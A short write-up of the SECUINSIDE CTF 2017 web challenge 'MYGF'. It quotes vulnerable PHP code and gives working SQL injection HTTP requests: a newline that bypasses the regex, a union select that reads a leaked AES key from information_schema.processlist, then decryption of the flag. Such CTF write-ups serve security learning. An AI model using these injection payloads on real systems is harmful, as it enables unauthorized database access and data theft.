Rating: 3.8

SECUINSIDE CTF Quals 2017
Web - MYGF

Sql-Injection part on line 137, where bypass regexp (newline) on line 129.
But we can’t access to `aeskey` database. It do select on line 134, put key into php-variable and close database.
But variable used in query on 139 line

```
127 else if($page == "read"){
128 $col = addslashes($_GET['col']);
129 $col = preg_match("/^no$/ismU",$col) ? $col : "";
130 $no = addslashes($_GET['no']);
131 $no = preg_replace("/[^0-9]*/s", "", $no);
132 include "dbconn.php";
133 dbconnect("aeskey");
134 $aeskey = mysql_fetch_array(mysql_query("select * from aeskey where boardno='{$no}'"));
135 mysql_close($db);
136 dbconnect("board");
137 $r = mysql_fetch_array(mysql_query("select * from board where {$col}='{$no}'"));
138 echo "<h3>Read</h3>

Subject : ".$r['subject']."

Content : ";
139 $contentdec = mysql_fetch_array(mysql_query("select *,aes_decrypt(unhex(content),unhex('".$aeskey['aeskey']."'))
140 as plain from(select * from board.board join member.members) as a where no='".$no."'"));
141 if($aeskey['useridx'] !== $_SESSION['idx']) exit("<font color="red">No Hack dude!</font>");
142 echo nl2br($contentdec['plain'])."

";
143 }
144 else{
```

We can leak it from `information_schema.processlist` race condition.
Let’s spam vector
GET /da53dfbdfc8c4abce4452cc441298081/?page=read&col=no%0A=-9+union+select+1,(select+INFO+from+information_schema.processlist+where+INFO+like+0x256465637279707425),3,4+from+board--+-&no=1 HTTP/1.1
in Burp Intruder.
```
<h3>Read</h3>

Subject : select *,aes_decrypt(unhex(content),unhex('f275dcc662617b4a5d312423bfd57416c9de5a94')) as plain from(select * from board.board join member.members) as a where no='1'

Content : <font color="red">No Hack dude!</font>
```
Now use
GET /da53dfbdfc8c4abce4452cc441298081/?page=read&col=no%0A=-9+union+select+1,aes_decrypt(unhex(content),unhex(0x66323735646363363632363137623461356433313234323362666435373431366339646535613934)),3,4+from+board--+-&no=1 HTTP/1.1
Host: 13.124.128.134

And get flag.